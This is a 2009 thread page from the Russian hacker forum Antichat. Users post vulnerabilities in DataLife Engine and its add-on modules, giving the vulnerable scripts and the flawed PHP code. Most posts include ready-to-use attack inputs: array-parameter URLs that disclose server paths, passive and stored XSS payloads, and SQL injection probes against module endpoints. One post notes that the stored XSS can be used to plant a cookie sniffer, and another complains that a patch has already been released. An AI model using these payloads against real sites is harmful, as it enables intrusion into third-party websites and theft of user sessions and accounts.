ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 16.01.2009, 08:15
Аватар для #Wolf#
#Wolf#
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
Провел на форуме:
3799424

Репутация: 479
По умолчанию

Цитата:
Сообщение от WP_  
niva622

1. Версию движка, можно узнать только в админке.
http://dle-news.ru/engine/ajax/updates.php
тут палить нулленый движки

Последний раз редактировалось #Wolf#; 25.08.2009 в 12:20..
 
Ответить с цитированием

  #32  
Старый 02.02.2009, 01:36
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Расскрыите путей:
Код:
http://site.ru/index.php?do=register&doaction=validating&step=2&id[]=1
(c) mailbrush
 
Ответить с цитированием

  #33  
Старый 10.02.2009, 15:54
Аватар для #Wolf#
#Wolf#
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
Провел на форуме:
3799424

Репутация: 479
По умолчанию

раскрытие путей
Цитата:
http://host.ru/engine/print.php?do=static&page[]=paramparam
результат
Цитата:
Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in [PATH]/engine/classes/mysql.class.php on line 162 Невозможно загрузить шаблон: info.tpl
UPD

Цитата:
http://host.ru/engine/rss.php?subaction=allnews&user[]=admin
UPD
для тех у кого есть доступ в админку(журналисты, модераторы и выше)
Цитата:
http://host.ru/admin.php?mod[]=main
(c) #Wolf#

ps
http://dle-news.ru/bags/v75/570-nedostatochnaya-filtraciya-vxodyashhix-dannyx.html

кандоны( уже патч выпустили(

Последний раз редактировалось #Wolf#; 18.02.2009 в 16:16..
 
Ответить с цитированием

Модули DLE
  #34  
Старый 27.02.2009, 15:10
Аватар для -Hormold-
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию Модули DLE

Youtube Video Downloader
Версия: 1.0


Пассивная-XSS
Собственно
Уязвимый скрипт: youtubedownloader.php
Запрос: http://www.youtube.com/watch?v=Gw0Ysp47hl8"><h1>simple</h1>
Метод: POST
Уязвимый кусок кода:
PHP код:
$video="$_POST[video]"
$video2 explode("watch?v="$video); 
$video2 explode("&"$video2[1]); 
$video2 $video2[0]; 
/////........
$pic="http://img.youtube.com/vi/$video2/default.jpg"
$youtube .="<center><br><b>$title</b><br><br><img src=\"$pic\"><br><br><a href=\"http://www.youtube.com/get_video?$link\">[ Download ]</a></center>"

 
Ответить с цитированием

  #35  
Старый 27.02.2009, 15:57
Аватар для -Hormold-
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

SPAM BUTTON in PM
Версия: v.1.0


Раскрытие путей

Уязвимый скрипт: engine\inc\pmspam.php
Запрос: --
Метод: --
Уязвимый кусок кода:
PHP код:
//До этого нет объявление функции и каких-либо includ'ов
echoheader("SPAM in PM""Админпанель модуля \"SPAM IN PM\" v.1.0 BY GRIMWEB"); 
 
Ответить с цитированием

  #36  
Старый 27.02.2009, 16:08
Аватар для -Hormold-
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

SPAM BUTTON in PM
Версия: v.1.0


ВОЗМОЖНО Sql-INJ

Уязвимый скрипт: engine\inc\pmspam.php
Запрос: flag=-1'
Метод: POST
Уязвимый кусок кода:
PHP код:
  if($_POST['spam_flag'])
  {
      foreach (
$_POST['spam_flag'] as $key => $value)
      {
        
$delete_spam_query "DELETE FROM " PREFIX "_spam_pm WHERE id = '$value'";
        
$delete_spam_query_id $db->query($delete_spam_query);
          if(!
$delete_spam_query)
          {
            
$spam_err true;
          }
      }
  } 
 
Ответить с цитированием

  #37  
Старый 27.02.2009, 16:25
Аватар для -Hormold-
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

DLE HACK SERVICE BETA
Версия: v.1.0


Расскрытие путей

Уязвимый скрипт: engine\inc\md5.php
Запрос: pass[]=md5
Метод: POST
Уязвимый кусок кода:
PHP код:
if (isset($_POST['pass'])) {
   
$pass=trim(htmlspecialchars($_POST['pass']));
   
$pass=md5($pass);

 
Ответить с цитированием

  #38  
Старый 27.02.2009, 16:41
Аватар для -Hormold-
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

Простой мини чат для Dle
Версия: v.1.0


Расскрытие путей

Уязвимый скрипт: shout.php
Запрос: name[]=1&message[]=msg
Метод: POST
Уязвимый кусок кода:
PHP код:
if (isset($_POST["name"], $_POST["message"])){
    
$name iconv("UTF-8""windows-1251"$_POST["name"]);
    
$message iconv("UTF-8""windows-1251"$_POST["message"]); 
Ошибка вызывается тем, что iconv неможет обработать Массив который передаётся через POST
 
Ответить с цитированием

  #39  
Старый 27.02.2009, 16:45
Аватар для -Hormold-
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

Простой мини чат для Dle
Версия: v.1.0


Активная XSS

Уязвимый скрипт: shout.php
Запрос: name=<h1> 1 </h1>&message=<h1> xsss </h1>
Метод: POST
Уязвимый кусок кода:
PHP код:
if (isset($_POST["name"], $_POST["message"])){
    
$name iconv("UTF-8""windows-1251"$_POST["name"]);
    
$message iconv("UTF-8""windows-1251"$_POST["message"]);
           
///........
            
$file[] = $id."¤".$name."¤".$message."¤".time()."\n";
            
///........
            
foreach ($file as $msgfwrite($fp$msg); 
///........ 
Этот баг даёт возможность поставить сниффер, и ловить куки
 
Ответить с цитированием

  #40  
Старый 27.02.2009, 16:56
Аватар для -Hormold-
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

profileZ. Смена логина
Версия: v.1.5


Sql-INJ

Уязвимый скрипт: engine/modules/profile.php
Запрос: usertitle=-1'
Метод: POST
Уязвимый кусок кода:
PHP код:
    $usertitle=$_POST['usertitle'];
    if (
strlen($password1)>0) {

    
$password1 md5(md5($password1));
    
    
$sql_user "UPDATE " USERPREFIX "_users set name='$usertitle', fullname='$fullname', land='$land', icq='$icq', email='$email', info='$info', signature='$signature', password='$password1', allow_mail='$allow_mail', xfields='$filecontents', allowed_ip='$allowed_ip' where name='$user'";
    
    } else {
    
$sql_user "UPDATE " USERPREFIX "_users set name='$usertitle', fullname='$fullname', land='$land', icq='$icq', email='$email', info='$info', signature='$signature', allow_mail='$allow_mail', xfields='$filecontents', allowed_ip='$allowed_ip' where name='$user'";
    
    } 
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Сценарии/CMF/СMS 156 07.06.2010 05:01
Обзор уязвимостей в платных CMS ZAMUT Сценарии/CMF/СMS 56 15.04.2010 21:02
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Форумы 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ